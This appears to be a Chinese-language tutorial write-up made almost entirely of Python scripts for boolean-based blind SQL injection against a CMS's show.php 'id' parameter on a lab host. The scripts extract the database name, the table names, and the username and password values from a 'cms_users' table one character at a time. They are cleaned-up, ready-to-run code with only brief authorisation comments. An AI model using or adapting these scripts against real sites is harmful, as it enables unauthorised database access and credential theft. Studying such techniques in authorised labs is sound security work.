SQL注入漏洞:CMS布尔盲注python脚本编写

文章目录: 库名爆破 / 爆破表名 / 用户名密码爆破

库名爆破
import requests
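# ---- Database name -------------------------------------------------------
# Boolean-based blind SQL injection through the `id` parameter of show.php.
# For id=33 the page served when the injected condition is TRUE has a
# Content-Length of 5263 (the value used in the write-up), so every probe
# reduces to "does the response length equal the true page's length".
# A Content-Length oracle is brittle (dynamic content, chunked responses);
# if it misbehaves, compare a body marker instead.
# NOTE(review): the target is the write-up's lab host; only run this against
# systems you are authorised to test.
TARGET_URL = "http://10.9.47.77/cms/show.php"
TRUE_LENGTH_ID33 = "5263"
REQUEST_TIMEOUT = 10        # seconds per request; the original requests had none
MAX_NAME_LENGTH = 64        # bound for the length probe; the original `while` was unbounded
PRINTABLE_ASCII = range(32, 127)   # the original tried 20..126; 20..31 are control codes


def _build_oracle(session, record_id, true_length, url=TARGET_URL, timeout=REQUEST_TIMEOUT):
    """Return ``oracle(condition) -> bool`` for the blind injection point.

    ``condition`` is a SQL boolean expression. It is sent as
    ``id=<record_id> and <condition>`` and the response counts as TRUE when
    its Content-Length header equals ``true_length`` (a string, as the
    header is).
    """
    def oracle(condition):
        resp = session.get(
            url,
            params={"id": f"{record_id} and {condition}"},
            timeout=timeout,
        )
        # .get(): a missing Content-Length must not raise KeyError mid-loop
        return resp.headers.get("Content-Length") == true_length

    return oracle


def _probe_length(oracle, expr, max_len=MAX_NAME_LENGTH):
    """Return ``length(expr)`` by asking ``length(expr)=n`` for n in 0..max_len.

    Raises RuntimeError when no n matches; in practice that means the
    true-page length given to the oracle is wrong, not that the name is long.
    """
    for n in range(max_len + 1):
        if oracle(f"length({expr})={n}"):
            return n
    raise RuntimeError(f"length({expr}) not found in 0..{max_len}; check the oracle")


def _probe_string(oracle, expr, length, charset=PRINTABLE_ASCII):
    """Recover ``expr`` one character at a time via ``ascii(substr(expr,pos,1))=code``.

    Stops at the first matching code for each position (the original kept
    sending the remaining codes after a hit). A position with no match is
    reported as ``?`` rather than dropped, which would silently shift every
    later character.
    """
    chars = []
    for pos in range(1, length + 1):
        for code in charset:
            if oracle(f"ascii(substr({expr},{pos},1))={code}"):
                chars.append(chr(code))
                break
        else:
            chars.append("?")
    return "".join(chars)


def recover_database_name(oracle):
    """Return the current schema name (``database()``) via the boolean oracle."""
    length = _probe_length(oracle, "database()")
    return _probe_string(oracle, "database()", length)


if __name__ == "__main__":
    with requests.Session() as session:   # one keep-alive connection for the whole dump
        database = recover_database_name(_build_oracle(session, 33, TRUE_LENGTH_ID33))
    print(database)   # the recovered schema name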
爆破表名
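# ---- Table names ---------------------------------------------------------
# Same injection point, now with id=35: the TRUE page for that record has a
# Content-Length of 5146 (the value used in the write-up). Table names are
# read from information_schema.tables one row at a time with `limit n,1`.
# NOTE(review): lab host from the write-up; only run against authorised targets.
TARGET_URL = "http://10.9.47.77/cms/show.php"
TRUE_LENGTH_ID35 = "5146"
REQUEST_TIMEOUT = 10        # seconds per request; the original requests had none
MAX_NAME_LENGTH = 64        # bound for the length probe
MAX_ROWS = 100              # bound for the row-count probe; the original `while` was unbounded
PRINTABLE_ASCII = range(32, 127)   # the original tried 20..126; 20..31 are control codes
TABLES_SUBQUERY = "select table_name from information_schema.tables where table_schema=database()"


# Helpers are repeated here so this section runs on its own, as in the write-up.
def _build_oracle(session, record_id, true_length, url=TARGET_URL, timeout=REQUEST_TIMEOUT):
    """Return ``oracle(condition) -> bool`` for the blind injection point.

    ``condition`` is a SQL boolean expression. It is sent as
    ``id=<record_id> and <condition>`` and the response counts as TRUE when
    its Content-Length header equals ``true_length`` (a string, as the
    header is).
    """
    def oracle(condition):
        resp = session.get(
            url,
            params={"id": f"{record_id} and {condition}"},
            timeout=timeout,
        )
        # .get(): a missing Content-Length must not raise KeyError mid-loop
        return resp.headers.get("Content-Length") == true_length

    return oracle


def _probe_length(oracle, expr, max_len=MAX_NAME_LENGTH):
    """Return ``length(expr)`` by asking ``length(expr)=n`` for n in 0..max_len.

    Raises RuntimeError when no n matches; in practice that means the
    true-page length given to the oracle is wrong, not that the name is long.
    """
    for n in range(max_len + 1):
        if oracle(f"length({expr})={n}"):
            return n
    raise RuntimeError(f"length({expr}) not found in 0..{max_len}; check the oracle")


def _probe_string(oracle, expr, length, charset=PRINTABLE_ASCII):
    """Recover ``expr`` one character at a time via ``ascii(substr(expr,pos,1))=code``.

    Stops at the first matching code for each position (the original kept
    sending the remaining codes after a hit). A position with no match is
    reported as ``?`` rather than dropped, which would silently shift every
    later character.
    """
    chars = []
    for pos in range(1, length + 1):
        for code in charset:
            if oracle(f"ascii(substr({expr},{pos},1))={code}"):
                chars.append(chr(code))
                break
        else:
            chars.append("?")
    return "".join(chars)


def _probe_value(oracle, expr, max_len=MAX_NAME_LENGTH):
    """Return the string value of SQL expression ``expr`` (length probe, then characters)."""
    return _probe_string(oracle, expr, _probe_length(oracle, expr, max_len))


def _dump_rows(oracle, subquery, max_rows=MAX_ROWS, max_len=MAX_NAME_LENGTH):
    """Return the rows of the single-column ``subquery`` as a list of strings.

    Row ``n`` is addressed as ``(subquery limit n,1)`` and ``... is not null``
    decides whether it exists. (The write-up compared ``length(...)`` with a
    constant whose operator was lost in extraction; an existence test is the
    intent.) ``limit`` without ``order by`` gives no guaranteed row order.
    """
    rows = []
    for n in range(max_rows):
        row_expr = f"({subquery} limit {n},1)"
        if not oracle(f"{row_expr} is not null"):
            break
        rows.append(_probe_value(oracle, row_expr, max_len))
    return rows


def recover_table_names(oracle):
    """Return the table names of the current schema via the boolean oracle."""
    return _dump_rows(oracle, TABLES_SUBQUERY)


if __name__ == "__main__":
    with requests.Session() as session:   # one keep-alive connection for the whole dump
        table_name_list = recover_table_names(_build_oracle(session, 35, TRUE_LENGTH_ID35))
    for table_name in table_name_list:
        print(table_name)
    print(table_name_list)

# ---- Next section of the write-up: username / password brute force ------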
import requests
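# ---- Columns of cms_users, then the username/password rows ---------------
# Still id=35 / true-page length 5146. First the column names of cms_users
# are read from information_schema.columns, then, if `username` and
# `password` exist, each of those columns is dumped row by row.
# Fixes versus the write-up: the column loop ran one row too many
# (`range(0, x+1)` for x rows, costing a full probe pass for a NULL row),
# every loop was unbounded or unthrottled with no request timeout, the
# final print indexed `password_list` with `user_List`'s indices (IndexError
# if the two differ), and the column listing was labelled as table names.
# NOTE(review): lab host from the write-up; only run against authorised targets.
TARGET_URL = "http://10.9.47.77/cms/show.php"
TRUE_LENGTH_ID35 = "5146"
REQUEST_TIMEOUT = 10        # seconds per request; the original requests had none
MAX_NAME_LENGTH = 64        # bound for column-name length
MAX_VALUE_LENGTH = 99       # bound for cell values; the original per-value loop was range(1, 100)
MAX_ROWS = 100              # the original row loop was range(0, 100)
PRINTABLE_ASCII = range(32, 127)   # the original tried 20..126; 20..31 are control codes
USERS_TABLE = "cms_users"
COLUMNS_SUBQUERY = (
    "select column_name from information_schema.columns "
    f"where table_schema=database() and table_name='{USERS_TABLE}'"
)


# Helpers are repeated here so this section runs on its own, as in the write-up.
def _build_oracle(session, record_id, true_length, url=TARGET_URL, timeout=REQUEST_TIMEOUT):
    """Return ``oracle(condition) -> bool`` for the blind injection point.

    ``condition`` is a SQL boolean expression. It is sent as
    ``id=<record_id> and <condition>`` and the response counts as TRUE when
    its Content-Length header equals ``true_length`` (a string, as the
    header is).
    """
    def oracle(condition):
        resp = session.get(
            url,
            params={"id": f"{record_id} and {condition}"},
            timeout=timeout,
        )
        # .get(): a missing Content-Length must not raise KeyError mid-loop
        return resp.headers.get("Content-Length") == true_length

    return oracle


def _probe_length(oracle, expr, max_len=MAX_NAME_LENGTH):
    """Return ``length(expr)`` by asking ``length(expr)=n`` for n in 0..max_len.

    Raises RuntimeError when no n matches; in practice that means the
    true-page length given to the oracle is wrong, not that the value is long.
    """
    for n in range(max_len + 1):
        if oracle(f"length({expr})={n}"):
            return n
    raise RuntimeError(f"length({expr}) not found in 0..{max_len}; check the oracle")


def _probe_string(oracle, expr, length, charset=PRINTABLE_ASCII):
    """Recover ``expr`` one character at a time via ``ascii(substr(expr,pos,1))=code``.

    Stops at the first matching code for each position (the original kept
    sending the remaining codes after a hit). A position with no match is
    reported as ``?`` rather than dropped, which would silently shift every
    later character.
    """
    chars = []
    for pos in range(1, length + 1):
        for code in charset:
            if oracle(f"ascii(substr({expr},{pos},1))={code}"):
                chars.append(chr(code))
                break
        else:
            chars.append("?")
    return "".join(chars)


def _probe_value(oracle, expr, max_len=MAX_NAME_LENGTH):
    """Return the string value of SQL expression ``expr`` (length probe, then characters)."""
    return _probe_string(oracle, expr, _probe_length(oracle, expr, max_len))


def _dump_rows(oracle, subquery, max_rows=MAX_ROWS, max_len=MAX_NAME_LENGTH):
    """Return the rows of the single-column ``subquery`` as a list of strings.

    Row ``n`` is addressed as ``(subquery limit n,1)`` and ``... is not null``
    decides whether it exists; the loop stops at the first missing row or at
    ``max_rows``. ``limit`` without ``order by`` gives no guaranteed row order.
    """
    rows = []
    for n in range(max_rows):
        row_expr = f"({subquery} limit {n},1)"
        if not oracle(f"{row_expr} is not null"):
            break
        rows.append(_probe_value(oracle, row_expr, max_len))
    return rows


def recover_credentials(oracle, table=USERS_TABLE):
    """Return ``(column_names, {column: [values...]})`` for ``table``.

    Only the ``username`` and ``password`` columns are dumped, and only when
    they are present (the original did the same by name). The column name
    interpolated into ``select {col} from ...`` is therefore always one of
    those two literals.
    """
    columns = _dump_rows(oracle, COLUMNS_SUBQUERY)
    values = {}
    for col in ("username", "password"):
        if col in columns:
            values[col] = _dump_rows(oracle, f"select {col} from {table}", max_len=MAX_VALUE_LENGTH)
    return columns, values


if __name__ == "__main__":
    with requests.Session() as session:   # one keep-alive connection for the whole dump
        columns, values = recover_credentials(_build_oracle(session, 35, TRUE_LENGTH_ID35))
    print("所有字段名")   # the original labelled these column names as "table names"
    for column in columns:
        print(column)
    print("账号密码")
    # The two columns were fetched in separate passes and are paired by
    # `limit` offset; without `order by` that pairing holds only if the
    # server returns the rows in the same order both times. zip() stops at
    # the shorter list instead of raising like the original index loop.
    for user, password in zip(values.get("username", []), values.get("password", [])):
        print(f"{user}:{password}")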